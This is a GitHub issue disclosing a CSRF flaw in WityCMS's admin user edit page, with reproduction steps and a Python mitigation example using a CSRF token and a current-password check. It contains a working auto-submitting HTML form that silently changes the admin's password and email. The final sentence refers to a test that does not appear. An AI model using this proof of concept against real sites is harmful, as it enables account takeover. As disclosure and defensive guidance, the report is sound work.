CSRF on admin/user/edit page lead to full account take over  #153

Closed
@chhaipov

Description

@chhaipov

Hello,

I came across this CMS and tried to find bugs in it. I see that the user edit page is vulnerable to a CSRF attack because there is no CSRF token to validate the user's request. It means that if an admin user visits a crafted URL made by an attacker (via XSS or phishing), a POST request will be generated and submitted to wity/admin/user/edit/1 that will change the admin user's information, including the password and email address.

Once exploited, the attacker can fully take over the admin's account.

Affected URL: http://192.168.56.200/wity/admin/user/edit/1

Steps to reproduce:

  1. Check the POST request sent when a user edits information on /wity/admin/user/edit/1
     [screenshot]

  2. Build a CSRF POC based on the POST request from user/edit and store it on the attacker's site

    <iframe id="test" name="test" style="display:none">
    </iframe>

    <form action="http://192.168.56.200/wity/admin/user/edit/1" method="post" id="the_form" style="display:none" target="test">
        <input type="hidden" name="id" value="1" />
        <input type="hidden" name="nickname" value="admin" />
        <input type="hidden" name="password" value="csrf123" />
        <input type="hidden" name="password_conf" value="csrf123" />
        <input type="hidden" name="email" value="csrf@test.com" />
        <input type="hidden" name="groupe" value="0" />
        <input type="hidden" name="type" value="all" />
        <input type="submit" value="Change Password" />
    </form>

    <script type="text/javascript">
    //<![CDATA[
        // Submit the hidden form as soon as the page loads
        var $form = document.getElementById('the_form');
        $form.submit();
    //]]>
    </script>

  3. Let the user access the CSRF POC on the attacker's site; a POST request will then be generated and sent to http://192.168.56.200/wity/admin/user/edit/1
     Visiting the attacker's site:
     [screenshot]
     POST request generated:
     [screenshot]

  4. After that, the user's information will be changed to the values the attacker put in the CSRF POC

Mitigation:

The original password should be required in order to set a new password for the user.
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
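The two controls the report's mitigation points to, a per-session synchronizer token checked on the edit POST and a current-password check before the password or email may change, as an added Python example (not WityCMS's own PHP code). The in-memory user table, the session layout, the hashing and the `csrf_token` / `current_password` field names are assumptions; the remaining form fields are those from the POC above.

```python
import hashlib
import hmac
import secrets

# Constructed in-memory user table (example only). Real code would use a
# password KDF such as bcrypt or Argon2 rather than a bare SHA-256.
def hash_password(pw: str) -> str:
    return hashlib.sha256(pw.encode()).hexdigest()

USERS = {1: {"nickname": "admin", "email": "admin@example.invalid",
             "password": hash_password("OldPass!1")}}

def new_session(user_id: int) -> dict:
    """Login creates a session holding a random per-session CSRF token.
    The token is rendered into the legitimate edit form; a page on another
    origin cannot read it, so a forged cross-site form cannot supply it."""
    return {"user_id": user_id, "csrf_token": secrets.token_hex(32)}

def handle_user_edit(session: dict, form: dict) -> tuple:
    """Hardened POST /wity/admin/user/edit/<id>. Returns (status, message)."""
    # 1. Synchronizer token: reject any POST lacking the session's token.
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token, session["csrf_token"]):
        return 403, "missing or invalid CSRF token"
    user = USERS.get(int(form.get("id", 0)))
    if user is None:
        return 404, "no such user"
    # 2. Re-authenticate before the fields that grant account takeover.
    wants_password = bool(form.get("password"))
    wants_email = "email" in form and form["email"] != user["email"]
    if wants_password or wants_email:
        current = hash_password(form.get("current_password", ""))
        if not hmac.compare_digest(current, user["password"]):
            return 403, "current password required to change password or email"
    if wants_password:
        if form["password"] != form.get("password_conf"):
            return 400, "password confirmation does not match"
        user["password"] = hash_password(form["password"])
    if wants_email:
        user["email"] = form["email"]
    user["nickname"] = form.get("nickname", user["nickname"])
    return 200, "updated"

# The POC's fields exactly as a cross-site form submits them: no token and
# no current password, so the request is rejected before anything changes.
FORGED = {"id": "1", "nickname": "admin", "password": "csrf123",
          "password_conf": "csrf123", "email": "csrf@test.com",
          "groupe": "0", "type": "all"}

if __name__ == "__main__":
    session = new_session(1)
    print(handle_user_edit(session, FORGED))  # (403, 'missing or invalid CSRF token')
    legit = dict(FORGED, csrf_token=session["csrf_token"], current_password="OldPass!1")
    print(handle_user_edit(session, legit))   # (200, 'updated')
```

A token bound to the session also stops a token stolen from one session from being replayed in another; the last check in the test below covers that case.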
